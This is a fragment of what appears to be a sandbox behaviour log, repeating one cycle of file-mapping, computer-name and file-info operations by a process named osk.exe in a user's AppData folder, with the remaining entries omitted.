| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
|
For performance reasons, the remaining 2023 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread 0xf74
338
0
| Category | Operation | Information | Success | Count | Logfile |
